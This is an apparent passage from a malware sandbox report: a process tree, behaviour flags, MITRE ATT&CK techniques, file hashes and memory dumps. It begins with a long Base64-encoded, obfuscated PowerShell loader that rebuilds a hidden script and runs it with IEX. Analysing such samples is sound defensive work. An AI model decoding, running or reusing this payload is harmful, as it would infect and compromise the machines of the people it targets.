bgBUAGUAYQBiAGUAdABLAG4AaQB2AHMAIABBAHIAZwB5AHIAQQBGAGwAYQBuAGsAbgBTAGgAdQBmAGYAcwBIAHUAbgBkAGUAaQBPAG0AZwByAGUAZwBVAG4AcwBvAGwAKQBUAGgAZQBvAGwAOwAKAFIAYQBuAHUAbgBbAFMAawByAGkAdgBEAEYAbwByAHMAdgBsAFUAbQB1AGwAaQBsAE4AbwBuAGMAcgBJAEQAaQB2AGkAcwBtAFMAcABpAGMAaQBwAEEAbgBkAGEAbgBvAFUAcwBzAGkAbgByAEEAZwBhAG8AYQB0AE0AYQBhAG0AZAAoAFMAeQB2AGEAYQAiAG8AcAB0AGkAbQBrAEkAbgB2AGUAbgBlAFMAdABhAHQAcwByAHMAdQBtAG0AZQBuAFUAbgBoAGEAbgBlAEMAYQBsAGkAcABsAEEAbQBvAHIAaQAzAFAAcgBvAGYAaQAyAEgAagB0AGkAZAAiAFQAcgBsAHMAbwApAFMAdAByAGUAbABdAFMAcQB1AGEAdABwAEIAbwByAHQAZgB1AFcAbwBsAGYAZABiAE0AZQB0AGEAZQBsAHMAaABhAG0AcABpAFIAZQBmAGwAYQBjAEEAYwBlAGQAaQAgAEQAbwB1AGIAbABzAEsAdgBvAHQAZQB0AEUAdQB4AGkAbgBhAFMAcgBmAG8AcgB0AHAAaABhAHIAeQBpAFAAYQByAGkAcwBjAEIAYQB0AHQAbAAgAFYAcgBkAGkAbQBlAE0AaQByAGEAawB4AEYAcgB1AGcAdAB0AEEAZgB0AHIAYQBlAFkAbgBnAGwAaQByAFMAaQBnAGoAbgBuAHYAYQBsAHUAYQAgAFIAZQBjAGgAaQB2AFMAdAB1AGQAZQBvAEIAbgBiAGwAYQBpAFQAYQBhAHIAbgBkAEwAaQBuAGQAZQAgAEcAYQB1AGcAZQBHAHMAaQBsAGUAbgBlAGcAYQBtAGUAbAB0AEcAbgBhAHQAcwBTAFIAaQBnAHMAcwB0AEwAbwBjAHUAcABhAE8AdgBlAHIAdwByAE4AYQB2AG4AZwB0AEIAdQB0AGwAZQB1AFIAZQBmAG8AcgBwAFcAYQBuAGsAZQBJAE8AbABpAGUAZgBuAFQAcgBzAGsAZQBmAEIAagBlAHIAZwBvAFAAbwBlAHAAaAAoAFYAaQBzAHUAYQBpAFQAZQBzAHQAYQBuAHQAdQBzAGUAbgB0AEkAcwBvAGMAaAAgAEIAcgBhAHMAaABIAFMAbABpAG0AcwBvAE0AaQBsAGwAaQB2AEsAdQBuAGQAZQBlAFMAawBhAG0AbQBkAFAAYQBhAGsAYQApAEMAbwByAHIAZQA7AAoARwBuAG8AbQBlAFsASwBsAHUAYgBzAEQARgBhAHQAdABlAGwAUwBwAGUAYQByAGwAQgBvAHYAYQByAEkAUAByAGUAYwBhAG0AVABnAGUAcgBuAHAAYQBmAHMAcABuAG8AVQBuAGEAbgBnAHIAYwBhAHQAYQBsAHQAUwB2AGkAZwBlACgARABhAGcAYgB6ACIARgBsAGEAZABvAGsAUgBlAHMAcwBvAGUARABlAGgAeQBkAHIAQwBvAHMAaQBtAG4AYwBlAG4AdAByAGUARQBuAHAAdQBrAGwAUwBsAGEAbgBnADMAQQBuAG0AcgBrADIARABpAGMAaABvACIAQgByAGEAZAB5ACkASgBhAGwAbwB1AF0ARwBlAG4AYgByAHAAZwBpAHIAZABsAHUAQQBmAHYAZQBuAGIAUwBuAGkAYwBrAGwAZAByAHUAbgBnAGkASQBkAG8AbABvAGMAQgBvAG8AawBtACAAQQBiAHIAbwBnAHMATQBlAGwAbABlAHQAUwBpAHIAZQBzAGEAQQBmAHMAawByAHQAUAByAGEAbQBiAGkAUgB1AGwAbABlAGMAUwBuAG8AZwBzACAAQwBpAHYAaQBsAGUAQwBlAG4AdAByAHgATQB5AG8AYwBlAHQAQgByAG8AZABlAGUARgBvAHIAbQBhAHIAcABvAGwAeQBzAG4AQQBnAGEAbABlACAARQByAG4AZQBzAGkAUwBwAGkAbgBkAG4ATgBvAG4AYgB1AHQAVABhAHoAZQB0ACAAVQByAGUAdABlAFYAQQBmAGYAaQBsAGkASABqAHIAbgBlAHIASQBuAGEAbQBvAHQAbwByAGcAYQBtAHUAVABlAGQAZQB1AGEAYgBlAGsAbABhAGwAYwBvAG4AdgBlAEEAZABvAG8AbQBzAGwAVQBuAGQAZQByAGwARQBuAGMAbwBtAG8AUwB0AHQAdABlAGMATwBwAHQAbwBiACgAQgBhAGcAZQBwAGkAQgBlAHQAYQBzAG4AVABpAG4AZwBoAHQAYQBsAGwAdQB2ACAAVwBhAGkAcgBpAHYAUABlAHQAdABsADEAcABhAHIAawBlACwAQQBjAHEAdQBhAGkAYgB1AHMAaAB3AG4ARABrAGcAYwByAHQAZgB1AHQAYwBoACAAVAByAGEAbABsAHYARwByAGEAYQBzADIAQgBhAHIAbwBtACwAQQBuAGsAcgBlAGkAZABlAHIAZQBzAG4ASQBzAHMAeQBsAHQAUwBvAHUAZgBmACAARQBuAGMAZQBwAHYAQwBpAHIAYwBsADMAQQBsAHMAaQBkACwAUABsAGEAbgBsAGkAUwBjAHIAaQBtAG4AQQBkAHYAaQBzAHQAYQBuAHQAYQBiACAATQBpAGwAbABpAHYAdgBvAHQAZQByADQAVAByAGEAbgBzACkARgBvAGwAZABiADsACgBPAGYAZgBlAG4AWwBXAGgAaQBuAGkARABBAGYAbABlAGQAbABPAHYAZQByAHcAbABTAHYAYQBuAGUASQBMAGEAYgBpAGwAbQBDAG8AbQBwAGEAcABEAG8AYwBlAHIAbwBCAGkAZABlAHIAcgBCAG8AbQBiAGUAdABNAGkAbgBkAGUAKABUAHIAZQBlAHQAIgBTAHMAbAB1AGcAdwBiAGUAZABvAHQAaQBkAHUAcgBhAG0AbgBNAGUAZwBhAGwAbQBVAGQAdAByAHkAbQBIAGEAcgBrAGkALgBLAHkAdABlAHMAZABXAHIAaQB0AGgAbABFAGYAZgBlAGMAbABkAGEAZwBzAGwAIgBKAG8AdgBpAGEAKQBVAG4AcABlAHIAXQBVAHIAbwBwAGgAcABTAGUAcgB2AG8AdQBwAGwAZQBuAGkAYgBSAHUAbgBnAGUAbABTAHQAZQBwAGMAaQBIAGEAYgBpAGwAYwBBAGwAcABoAGEAIABEAHkAbgBlAGwAcwBHAGUAbgBiAHIAdABTAHAAYQBjAHkAYQBLAGUAbgBkAGUAdABBAHUAZABpAHQAaQBBAHUAdABvAHQAYwBMAHUAdABlAG8AIABHAGUAbgBiAHIAZQBhAGQAdgBvAGsAeABDAG8AcwBpAGcAdABPAHAAcwBsAG0AZQBSAGUAYQBsAGwAcgBiAGEAYQBuAGQAbgBSAGUAdAB1AG4AIABJAG4AZABlAGIAaQBTAG8AbABpAHEAbgBQAGkAdABhAGIAdABGAGUAbQBpAG4AIABTAGoAYQBrAHIAUwBLAGEAcABzAGUAZQBEAGkAcwBzAGkAbgBNAGUAbABvAGQAZABLAG4AaQBnAGgARABTAHQAeQBsAG8AcgBUAGUAcgBuAGEAaQBMAG8AdgBwAHIAdgBUAGgAaQBzAGgAZQBTAG8AdgBzAGUAcgBNAGkAYwByAG8ATQBoAG8AcgBtAG8AZQBQAHIAbwB2AGUAcwBNAHUAcwBpAGMAcwBOAG8AbgBtAHUAYQBVAG0AdQBsAGkAZwBBAGQAYQBwAHQAZQBCAHIAdQBnAGUAKABFAGYAdABlAHIAaQBLAG8AcwBtAG8AbgBpAG4AZAB2AGEAdABCAGEAawBlAHIAIABEAG8AYwBrAGUATABhAHMAdQByAGkAYQBGAG8AcgBkAHkAbgBMAGkAYgBhAHQALABMAGkAdgBlAHIAaQBSAGUAYwBlAG4AbgBQAHIAbwBmAGUAdABNAGUAbgBhAGcAIABSAHUAcwB0AHAAQwBIAG8AbQBvAHAAbwBBAHUAdABvAHQAbgBTAHUAYgB0AHIALABkAGUAcABhAGcAaQBSAGUAbgBhAG0AbgBMAGUAagBuAGkAdABVAG4AZABvAG0AIABCAHkAcABhAHQASwBGAGwAeQBnAHQAbwBGAGEAawB0AHUAbgBBAGQAZABpAGMAdABUAGUAawBuAG8ALABDAGEAcwBzAGkAaQBSAGUAcwBzAGUAbgBVAGQAcwBtAHkAdABTAGsAbwBsAGUAIABJAG4AZABlAGwAUwBLAG8AbgB0AHIAdABBAGIAYgByAGUAYQBQAGgAbwB0AG8AYQBTAGkAbgBrAGYAYgBQAGgAcgBlAG4AKQBSAGUAYwBvAG8AOwAKAEYAYQBzAHQAaABbAEwAYQBjAHUAcwBEAEQAaQBzAGEAcwBsAFUAcAByAGkAdgBsAFkAbwBrAGUAdwBJAEcAZQBuAG0AYQBtAFMAdABpAG0AaQBwAGYAZAByAGUAbABvAHQAaAByAGUAYQByAFUAZABtAHUAZwB0AE0AeQByAGUAcgAoAFIAZQBhAG0AYQAiAFMAdAByAGkAawB3AEQAZwBuAHAAcgBpAFUAbgBiAHIAYQBuAE8AdgBlAHIAaABtAFMAbwBkAGEAbABtAEYAZQB1AGQAYQAuAEYAcgBlAG0AcgBkAFMAdwBpAG0AbQBsAEEAbABsAGUAZwBsAE8AdgBlAHIAdwAiAEYAbAB1AHkAdAApAEIAbwBiAGwAbABdAEYAbwByAHIAZQBwAE8AbABpAHYAZQB1AEkAbgBkAGUAawBiAE0AZQB0AGEAdwBsAFcAYQBzAGgAdABpAEQAcgBhAG0AYQBjAHQAcgBhAG4AcwAgAEsAaQBsAGUAcgBzAE0AYQB0AHQAbwB0AEcAYQB2AG4AZQBhAEcAbwBhAGQAcwB0AEIAbwB1AGkAbABpAE4AZABzAGkAZwBjAFIAZQBpAGYAaQAgAEYAZQBtAG8AZwBlAEgAYQBsAHMAYgB4AEEAZgBzAGsAYQB0AE4AbwBuAGMAcgBlAEIAcgBzAGkAZwByAFQAeQBtAHAAYQBuAFMAcAB1AHIAZwAgAFIAdQBiAGIAZQBpAEkAcwBwAGUAbABuAFAAdQBkAHIAZQB0AFAAaQBtAGkAZQAgAEoAbwBoAG4AbgBtAEgAeQBkAHIAbwBpAEgAYQBsAGYAbABkAEYAaQBzAHMAdQBpAFAAYQBrAHYAbwBPAEEAbABnAGUAcgB1AEcAcgB1AG4AZQB0AFMAdQBiAHIAbwBNAEYAcgBlAG0AcwBlAEsAcgB5AGIAZQBzAFMAawBlAGwAZQBzAEQAaQBzAHQAYQBhAGwAaQBtAG8AdQBnAEgAZQByAG8AaQBlAE0AeQB0AGgAbwAoAFAAZQBwAHMAaQBpAEMAcgBhAHcAbABuAEgAYQBsAHMAawB0AEwAeQBuAGMAaAAgAEYAbwByAG0AaQB1AFQAZQBsAGUAZgBuAEMAaABlAGYAZwBwAEQAcgB1AHAAZQBsAEYAcgB0AHQAcgBhAFMAdAByAGkAawAsAEIAbwByAHQAbABpAFQAbwBuAGUAZwBuAE4AZwB1AGwAdAB0AE8AYQBmAGEAbgAgAFAAaAB5AHMAaQBCAEUAZwBhAGwAaQBlAEkAbQBiAHIAbwBzAFQAcgBvAHYAcgB0AEQAdQBlAGwAYQAzAE4AeQBoAGUAZAAxAFMAdQBiAGwAaQAsAEwAaQB2AHMAZgBpAFUAbgBjAG8AbgBuAEgAZQByAGIAYQB0AEgAeQBkAHIAbwAgAEMAbABpAG0AYQBTAE4AeQBzAHQAcgBwAEwAdQBuAGcAZQBpAEIAbABvAHcAbwAxAEEAdgBuAGIAZwAxAHAAZQByAGMAaQAwAEQAaQB0AHIAbwAsAGMAaABhAG4AZABpAEIAaQBiAGwAaQBuAFMAbgBrAGUAawB0AEYAbABnAGUAbgAgAE0AYQBpAHMAbwBNAEUAawBzAHAAZQBvAE0AaQBzAGYAbwBuAEwAYQBrAG8AbgBvAEIAZQBzAGsAYQBuAFcAZQBhAHQAaABvAEMAeQB0AG8AaAApAFYAYQBnAHQAcwA7AAoAUwBrAHkAZABlAFsAUwBuAG8AcgBlAEQAUgBvAHIAcwBjAGwAVQBuAGcAZABvAGwAVABhAG4AZwBsAEkASwBhAGYAZgBlAG0ARABlAG4AZAByAHAAQgBlAHMAbAB1AG8ATABlAHUAYwBvAHIAUwBhAG4AZABzAHQAUwBhAG4AagBhACgAUABsAGUAbwBuACIAVgBhAHMAawBlAGcAQgBpAGsAcwBlAGQATABhAHIAZABlAGkAQQBwAGgAbwB0ADMAUgBtAGUAYgByADIATQBpAGMAcgBvACIARQBsAG8AeABlACkARQB4AHQAcgBhAF0AVQBlAHQAYQBiAHAASABpAG4AZABlAHUAUwBwAG8AcgBvAGIAUwB0AGoAZQByAGwAUwB3AGEAbQBwAGkAUwBwAGwAaQBkAGMAUwBlAGwAagB1ACAASABlAG4AcwBsAHMASwBvAGsAawBlAHQASQBuAHQAZQByAGEARABrAGsAZQB0AHQATQBhAHkAYgBsAGkASwBuAGEAcABzAGMARwB1AGwAZgB3ACAARwBlAHMAdABiAGUAQwBoAHIAaQBzAHgAcABhAG4AdABoAHQAVQBuAHEAdQBhAGUARgByAGUAcgBlAHIAVgBpAHIAaQBkAG4AdQBuAGMAaABhACAAUwBlAG0AaQBzAGkATgBvAG4AZABpAG4AUgB0AGUAYgBsAHQAQgB1AGcAcwBwACAAUwBrAHkAZQB5AEcAVQBuAGYAcgB1AGUAcwBwAG8AcgBhAHQASgBvAHUAcgBuAFAAVABpAGwAYgBhAGkATABpAHMAdABlAHgAQwBoAGEAcgBpAGUAVABhAG4AZABlAGwAbABvAHIAYQBzACgASwBhAGEAZAB0AGkASABvAG0AbwBlAG4AUwBtAGEAcwBrAHQARwBlAG4AcgBlACAATgB5AGIAeQBnAFMAVgBpAHQAcgBhAHAAQwBoAGEAbABvAHIAQQBuAGsAbwBtAG8ATQBhAHQAdABhAGcAVgByAHQAcABsAGYAUwBpAGcAaAB0ACwATQBuAGUAbQBvAGkATQBpAHMAZgBlAG4AUwBvAG4AaQBmAHQAQwBsAGUAZQBrACAATwB2AGUAcgBmAFAAYQBuAHQAaQBxAGEAQgBvAGEAcgBmAHIAUwBhAG4AZABhACwAUwBrAGUAbQBhAGkAQQBiAG4AbwByAG4AQgBsAGEAcwB0AHQAUwB0AHUAbQBiACAAUABhAHAAaQBzAFQAUwBuAHUAcwBlAHYAUwBhAHQAaQBuAGUAWQBvAHUAbgBnAHMARQByAG8AYgByAGkAUwBhAGMAcgBpACkAUgBhAHMAZQBuADsACgBBAGcAbAB5AHAAfQAKAG0AZQB0AGEAcAAiAEEAZwBlAHIAZABAAAoARgByAGUAbQBtACQATgBlAHQAdgByAE8AQgBhAG4AawB2AHYAUABlAHIAZAB1AGUARgB1AGMAawBpAHIARQBsAGEAcwB0AHAAQgBlAHYAcgB0AHIASQBuAGEAZAB2AGkAQgByAG8AYwBoAGMATQBhAHMAawBpAGkARQBzAHQAcgBhADMARQBjAGgAbwBsAD0AVQBkAGQAYQB0AFsAUwBpAG4AbwBpAE8AQgBpAGwAbABhAHYAZABvAGIAYgBlAGUARwB1AHQAdABpAHIATgBhAGsAaABvAHAATgB5AHAAcgBpAHIARwByAGEAcwBwAGkATQBhAGEAbABiAGMASABlAG4AcwBsAGkARQBsAHYAZQByADEAQQBuAGEAawBvAF0ARgB5AHIAZQBzADoARAB5AGQAcwBkADoAUwBhAGwAaQBjAFYAQQBtAGUAcgBjAGkAQQBmAHMAawB1AHIAUwB0AG8AZgBtAHQATQB2AGgAYQBuAHUAYQBkAGEAcABhAGEAUwBpAGQAZQBzAGwAQgB5AHIAZQB0AEEATwBuAGEAbgBlAGwAQgByAHUAZwBlAGwAVgBpAGwAZABzAG8AQgB1AGUAcwBrAGMAVgBhAG4AZABsACgAUgBlAHYAZQBpADAARwBvAGIAcwB1ACwARAByAHUAcgB1ADEARgBsAGcAZQBuADAATQBvAHIAdABlADQASQBuAGwAYQBwADgAQgByAGkAcwBhADUAUgBlAHQAcwBiADcASQBtAHAAcgBvADYAQgBlAHMAawByACwATABlAGoAZQB2ADEAUgBvAGwAbABlADIAaABrAGwAZQBuADIARgBvAHIAdAB2ADgAWgBvAGwAbwBzADgAUgBlAHYAaQBzACwAVAByAGEAcABiADYAUwBvAG0AZQB3ADQARgByAGUAZABlACkACgBQAHIAbwBrAHUAJABDAHIAZQBzAHQAdABJAHMAbwBnAG8AcgBTAGwAZQBpAGcAawB2AGkAawBhAHIAYQBUAGEAcgBtAHIAcwBUAG8AYQBkAHkAcwBTAGkAbQBiAGUAZQBDAGUAbABsAGUAcgBQAGEAbABlAG8AbgBSAGUAZABjAG8APQBJAG0AcAB1AHIAKABCAHIAaQBzAGEARwBGAHIAcwB0AGUAZQBTAGMAdQBnAHUAdABQAHIAbwBmAGkALQBIAGkAcABwAG8ASQBKAGEAdQBuAHQAdABWAG8AbABsAGUAZQBHAHkAbQBuAGEAbQBQAHIAYQBlAGwAUABHAGEAbABlAG4AcgBMAHUAbABsAGEAbwBQAGEAcgB0AG4AcABPAHAAcABlAGIAZQBGAG8AcgBzAGsAcgBPAHYAZQByAGEAdABYAGEAbgB0AGgAeQBLAGEAbABrAHUAIABLAG8AbQBwAGUALQBWAGEAdQBkAGUAUABKAGEAbQB0AGwAYQBIAHkAcgBhAGMAdABPAHIAYwBoAGkAaABUAHkAZgBvAG4AIABaAG8AbwBnAGUAIgBGAGUAbQBkAG8ASABRAHUAaQBuAHoASwBDAG8AcAByAG8AQwBEAGkAdAByAG8AVQBSAGUAZwBuAGkAOgBTAGUAYQBiAGkAXABHAG8AcgBnAGUAUwBDAGEAbgBjAGUAbwBQAHkAagBhAG0AZgBVAG4AcwB1AGwAdABVAGQAcgBlAGoAdwBQAHIAagB1AGQAYQBOAG8AbgBhAGIAcgBMAHUAZgB0AGEAZQBTAHUAcABlAHIAXABNAGkAZwBuAG8AVgBMAGUAZwBpAHQAYQBQAGUAdAByAGkAbgBPAHAAcwB1AGcAZABVAHAAcwB0AHIAZwBMAGkAYwBrAGUAIgBtAGEAagBvAHIAKQBOAG8AcgBtAGEALgBFAGYAdABlAHIAUwBVAGgAbwBsAGQAZQBEAGkAcgB0AGkAbQBGAGEAcwB0AHMAaQB0AGEAbABzAHkAaABGAGwAdQBlAGcAdQBBAGwAZQB0AHIAbQBEAHYAcgBnAGEAYgBBAHMAcwBhAHMAdQBQAGUAbgB0AG8AZwAKAEEAaQByAGEAcAAkAEEAcABoAGEAbgBBAFMAdQBwAGUAcgBhAFIAZQBzAHAAbwByAEEAZABkAGkAdABnAFMAZQBtAGkAZABhAFQAagBlAG4AZQBuAEIAbwBvAHQAZQBnAEUAbgBnAGUAbABzAEsAbgBzAG8AcgBhAEEAZgBkAGUAbAB2AFAAcgBlAGMAYQAgAEcAYQByAGMAZQA9AFUAbgBwAHIAbwAgAEEAZAB2AGUAcgBbAEYAcgBpAHMAdABTAE4AYQB2AG4AbAB5AFMAYQBwAGEAagBzAE8AdgBlAHIAZwB0AFUAbgBkAGUAcgBlAFQAcgBhAHAAbABtAFIAeQBnAHMAawAuAEgAdgBpAGQAcwBDAFAAcgBzAHUAbQBvAEwAdQBjAHUAbQBuAFAAaABhAHIAbQB2AEsAaQBkAG4AYQBlAEEAZgBiAGoAZQByAFQAaABhAG4AYQB0AE0AbwBwAHAAZQBdAEYAYQBuAHUAaQA6AE8AcABwAG8AbAA6AEQAbwBsAGkAYwBGAE0AbwBuAG8AcwByAFAAcgBvAGwAZQBvAFIAbwBzAGMAaABtAE0AZQBhAHMAdQBCAGEAawBrAGwAYQBhAFUAbgBjAG8AbQBzAFIAZQBhAGcAZwBlAE8AdgBlAHIAcgA2AGkAbgB2AGUAcwA0AE8AdgBlAHIAcwBTAFQAYQBjAGgAaQB0AEEAdQB0AG8AZQByAEgAYQBsAHYAcwBpAEEAbgBrAGwAYQBuAFQAdQBkAGUAaABnAEEAYQBuAGQAZQAoAFIAYQBkAGkAbwAkAEoAbwByAGQAYQB0AFMAdABvAHIAZQByAEQAaQBjAGgAbwBrAFUAcwB0AGUAbQBhAGEAcwBzAGEAaQBzAFAAZQBqAG8AcgBzAHcAaQByAGUAZABlAFcAaABpAGYAZgByAGcAbwB1AHIAbQBuAEEAZgByAG8AYQApAAoAQgByAGkAawBzAFsAQQBmAGQAYQBtAFMAUwBrAGUAdABjAHkAUwBlAG4AZwBlAHMARwBlAG4AdgBlAHQASAB5AGUAcgBzAGUAaQBsAGwAYQB1AG0ATQB1AHQAdABvAC4AVABlAGUAdABoAFIAQQBkAHIAZQBzAHUAUgBlAGQAaQBzAG4AVAByAGEAbgBzAHQAVgB1AGwAawBhAGkATgBvAG0AaQBuAG0ASQBuAHEAdQBpAGUAQQBmAGwAYQBhAC4ARAB2AHIAZwBoAEkAVABvAHUAZwBoAG4AVABoAHcAYQBjAHQATgBvAG4AcwB0AGUAUwBhAG4AZwB0AHIAVQBuAGEAbABsAG8AUABhAGwAbQBpAHAAcQB1AGUAYQBzAFMAQQBpAHIAcwBhAGUAbwBlAGUAbgBzAHIAUwBhAGIAbwB0AHYAQwBvAGwAbwByAGkAVQBuAGMAdQByAGMASwBvAHIAcAB1AGUAQQBhAHIAaAB1AHMARwB1AGwAZgB5AC4AVABvAG8AdABoAE0AQgByAGEAaABtAGEAUwBhAG4AZABzAHIAQgBsAGEAbgBrAHMAQQBsAGwAaQBvAGgASABvAHUAbAB0AGEATABnAGUAaAB1AGwARAByAGkAawBrAF0AQgB1AG4AZwBzADoAVAByAG8AawBpADoARwB5AGwAZABpAEMAUwBlAHgAcwB5AG8AUAByAGUAZgBsAHAATQBpAGwAbABpAHkAVgBhAGcAYQBiACgAVAByAHUAbgBjACQAUwB0AG8AcgBnAEEASAB5AHAAbwBwAGEARABpAGMAYQByAHIAYQByAGIAZQBqAGcARwBhAHUAegBpAGEATgBvAG4AdgBpAG4AUgBlAHAAdABpAGcAQgBpAGsAZQByAHMATQBpAGwAagBrAGEATABlAHQAaABhAHYASQBuAGMAbwBlACwASABlAGoAZABpACAAVgBlAGcAZQB0ADAAUgBlAGkAYwBoACwAUgBpAGIAaAB1ACAAVABvAHgAaQBjACAASABlAGwAbQBpACQAQQBuAGMAeQByAE8ATABhAGQAeQBzAHYAQQBuAGEAeABpAGUAUwBhAGwAbQBlAHIAQgB5AHIAaQBuAHAAVwBvAG8AbABkAHIAWgBlAGIAcgBhAGkAVABvAHAAcwBlAGMATQByAGsAZQBsAGkAUwBxAHUAaQByADMATQBlAG4AdQBzACwARABoAGEAaQB0ACAAUQB1AGEAbgB0ACQAQQBkAHYAbwBrAEEAQQBtAGUAbABpAGEAdABhAGEAcgBlAHIATQBlAHQAZQBvAGcATwBwAHIAYQBhAGEASABqAHIAbgBlAG4ATwBlAGsAbwBuAGcAQQBuAHQAaQBtAHMAUwB0AGkAbABsAGEAawBvAG0AYgBpAHYAQgBlAHMAawB5AC4AVwBhAGsAZQBuAGMAdgBhAHIAbQBlAG8AZQBsAGUAYwB0AHUAYwBhAHIAbwBsAG4AUgB1AHMAawBuAHQAVABpAGsAYQBtACkARwBhAHIAdgBlADsACgBQAGEAdAByAGkAWwBLAG8AbgBrAHUATwBNAGkAbgBkAHMAdgBpAG4AZABpAGMAZQBCAHkAbgByAHQAcgBQAHIAbwBmAG8AcABTAHQAcgBlAHUAcgBPAGwAbABpAGUAaQBEAGUAbABmAGkAYwBBAG4AbgBhAG0AaQBLAG8AcgB0AGUAMQBmAHIAYQB0AHIAXQBNAHUAbAB0AGkAOgBIAHUAbQBhAG4AOgBCAGEAcgBrAGIARQBCAGkAdAB0AGUAbgBTAGUAcgBlAG4AdQBCAGkAcwBsAGUAbQBFAHgAYwBhAGwAUwBVAG4AaQB2AGUAeQBXAGkAdABoAGQAcwBUAGEAYgB1AGwAdABQAHIAbwB0AGUAZQBJAG4AYQBjAHQAbQBUAGUAbABlAHAATABTAHQAbwByAGUAbwBMAG8AZgB0AHMAYwBFAG0AYgBvAGwAYQBUAGgAZQBsAHMAbABJAG4AZABoAG8AZQBQAHUAbABwAG8AcwBEAGUAcABvAG4AQQBVAG4AdABhAG4AKABWAHUAbABnAGEAJABSAGkAbQBhAHMATwBVAGQAdAByAHkAdgBBAHQAdABlAG4AZQBDAGEAbgBhAGQAcgBTAHUAcABlAHIAcABQAHUAbABwAGkAcgBGAG8AcgBwAGwAaQBCAGkAbwBzAGkAYwBUAGUAcgBtAG8AaQBTAGsAcgBpAHYAMwBBAG4AZwBvAGwALABVAG4AdAB1AG4AIABDAGgAcgBvAG0AMABQAHIAZQBqAHUAKQBGAGwAbwB3AGkAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABQAGwAdQBrAGsAZQB0AHMALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAA1ACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJABTAGsAcgB1AGIAYgBlAHIAaQAgAD0AIAAkAFMAawByAHUAYgBiAGUAcgBpACAAKwAgACQAUABsAHUAawBrAGUAdABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADEAKQANAAoACQANAAoACQBpAGYAIAAoACQAUABsAHUAawBrAGUAdABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAFMAawByAHUAYgBiAGUAcgBpACAAPQAgACQAUwBrAHIAdQBiAGIAZQByAGkAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABTAGsAcgB1AGIAYgBlAHIAaQANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3808
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yrjq4iiv\yrjq4iiv.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4220
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD585.tmp" "c:\Users\Admin\AppData\Local\Temp\yrjq4iiv\CSCC98A9CCEDC3A45A59C6226301CBF4C6A.TMP"
      4⤵
      PID:1912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD585.tmp

Filesize
1KB

MD5
76f142d76b6a03582ef7c6909d1f8d1a

SHA1
0d3f07b1e2a6df040be1252c3fade160bbbc0ed2

SHA256
f3d39f5ba67b9795024c86521674af2e5473649d08408e47b0fde98b8e3d255a

SHA512
e75ca85c880367b94f5257c320191ddfeb88baee996983f13606f4cefff12435bb97831c5b2981c4e37da2efffda5f665e35e684d5fd4b216fff92a5b2251e31

Download Submit
C:\Users\Admin\AppData\Local\Temp\yrjq4iiv\yrjq4iiv.dll

Filesize
4KB

MD5
4dd1f05dbe81254464af65984759485c

SHA1
b2dae5438b2b3c4a521a35b3089291aba4ab61d6

SHA256
9b093fb827918da6a632005bef24ed82b6ce834f068a04706c7e47d1f2a20928

SHA512
67ce03778c01009e90bad882626e8b6f8003dbb33699c5bcd4349a38baee07627a5e3db883189e888360eecff6c7d7a2a259163cf54be942ba3707e6fbab045d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yrjq4iiv\CSCC98A9CCEDC3A45A59C6226301CBF4C6A.TMP

Filesize
652B

MD5
2c2bde9d31ebc3156895231c13b40416

SHA1
57bf5e9c26b4b013b022b61ae6b3ca7e83f5747e

SHA256
f5d3c214ad3ad6bb73860fc2f6a57e69a4f6f3a936170617e196c5bfeebdd65a

SHA512
5776a392fa07720e4894ccec39f5b1835513c9ce1646940cae52f8b487582460a84fff6ec53fb5634ed90d64177dc37e14dd28237eeb6d0c3b1aaed41be1757f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yrjq4iiv\yrjq4iiv.0.cs

Filesize
1KB

MD5
19fd5b290598aefd6344d702f27a8781

SHA1
52763e3a36527cc2f07d80253c7fe6995ca4b1d0

SHA256
f4a28d3a3b8f78c406cfb68ebfb2ea45b55bb0e8eb310caefbb0ca7478b7cd87

SHA512
e62187ab96e9ef730d5e4c9ff973123154f5866eaac87a751dcdaac54a5a36da923c82f6cd65d6c62465f24b0f20e217c04a6e574b790a5c7710fa382e848fdb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yrjq4iiv\yrjq4iiv.cmdline

Filesize
369B

MD5
8ede341dd5b98f2a0423cea0ba7754b7

SHA1
d09ae833deeb491d53adcafb0a7f0987c8bf8b4c

SHA256
0740613cdbba942089e29acb193ec93b4748f9cfbe1b2483d833e98aaced4373

SHA512
5676465c78ae4c4463a5d7a4bcbf557bc7a77bbd523248c83b4d5de83959dd83d3b469950b314edeae15ac36ff6ecb69656daef96fe35efd0095680f99a203cc

Download Submit
memory/3808-149-0x00000000075E0000-0x0000000007602000-memory.dmp

Filesize
136KB

Download
memory/3808-148-0x00000000077B0000-0x0000000007846000-memory.dmp

Filesize
600KB

Download
memory/3808-140-0x0000000006B20000-0x0000000006B3A000-memory.dmp

Filesize
104KB

Download
memory/3808-152-0x00000000076B0000-0x0000000007D2A000-memory.dmp

Filesize
6.5MB

Download
memory/3808-136-0x0000000005C50000-0x0000000005CB6000-memory.dmp

Filesize
408KB
